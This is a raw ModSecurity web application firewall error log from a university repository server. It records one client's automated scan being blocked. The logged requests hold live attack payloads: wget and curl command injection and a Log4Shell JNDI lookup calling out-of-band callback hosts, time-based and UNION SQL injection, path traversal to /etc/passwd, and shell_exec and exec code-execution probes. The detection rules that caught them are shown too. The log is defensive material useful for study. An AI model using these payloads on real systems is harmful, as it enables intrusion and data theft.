[Tue Aug 29 11:30:30.444712 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAOOuUoAAAAW"]
[Tue Aug 29 11:30:31.347172 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAPiBfkAAAAB"]
[Tue Aug 29 11:30:32.679949 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPPSwIAAAAd"]
[Tue Aug 29 11:30:33.433217 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOM4WwAAAAU"]
[Tue Aug 29 11:30:34.437730 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahv8AAAAL"]
[Tue Aug 29 11:30:34.439073 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgd5r8obj5ye7st.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPDnx4AAAAP"]
[Tue Aug 29 11:30:34.440278 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPQkfsAAAAe"]
[Tue Aug 29 11:30:34.443894 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahv8AAAAL"]
[Tue Aug 29 11:30:35.473584 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPahwEAAAAL"]
[Tue Aug 29 11:30:35.692686 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPmhMUAAAAV"]
[Tue Aug 29 11:30:36.457170 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPMmAwAAAAY"]
[Tue Aug 29 11:30:37.333584 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPv-FEAAAAM"]
[Tue Aug 29 11:30:37.424936 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPOhZgAAAAa"]
[Tue Aug 29 11:30:37.622277 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPiBhEAAAAB"]
[Tue Aug 29 11:30:37.666590 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPpWdgAAAAI"]
[Tue Aug 29 11:30:39.333204 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhYAAAAB"]
[Tue Aug 29 11:30:39.335812 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhYAAAAB"]
[Tue Aug 29 11:30:39.569150 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOM4X8AAAAU"]
[Tue Aug 29 11:30:42.470629 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPDnzkAAAAP"]
[Tue Aug 29 11:30:43.308157 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10c8Co-f0AAAPmhMkAAAAV"]
[Tue Aug 29 11:30:43.447781 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg6arntws8gkdqt.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPv-GcAAAAM"]
[Tue Aug 29 11:30:43.454982 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPmhMsAAAAV"]
[Tue Aug 29 11:30:44.316607 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAN@4-QAAAAO"]
[Tue Aug 29 11:30:45.414522 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPPSxEAAAAd"]
[Tue Aug 29 11:30:47.444575 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAN@4-4AAAAO"]
[Tue Aug 29 11:30:47.445527 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAOM4YwAAAAU"]
[Tue Aug 29 11:30:47.519084 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPPSxYAAAAd"]
[Tue Aug 29 11:30:48.313070 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPOha0AAAAa"]
[Tue Aug 29 11:30:48.389782 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgtq3xzgu14ae7g.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPxBUgAAAAS"]
[Tue Aug 29 11:30:48.392858 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPmhN4AAAAV"]
[Tue Aug 29 11:30:50.399898 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPxBU4AAAAS"]
[Tue Aug 29 11:30:51.316914 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAO879MAAAAF"]
[Tue Aug 29 11:30:51.326490 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPQkhkAAAAe"]
